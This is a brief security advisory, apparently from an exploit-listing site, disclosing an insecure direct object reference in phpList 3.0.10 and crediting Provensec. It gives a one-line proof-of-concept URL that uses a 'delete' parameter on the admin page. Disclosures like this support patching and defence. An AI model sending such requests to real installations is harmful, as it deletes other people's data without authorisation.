phpList 3.0.10 Insecure Direct Object Reference

Posted on 02 April 2015

# Affected software: phplist # Type of vulnerability: insecure object reference # URL:phplist.com # Discovered by: Provensec # Website: http://www.provensec.com #version: phpList ltd. - v3.0.10 # Proof of concept insecure object refrenced on page deltetation vuln param:delete example: http://demo.phplist.com/lists/admin/?page=send&delete=2&tk=035d99 ref: https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_%28OTG-AUTHZ-004%29

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

Relate Cross Site Scripting
Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Authentication Bypass
Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Insecure Direct Object Reference
Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Authentication Bypass
Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Insecure Direct Object Reference

Last 20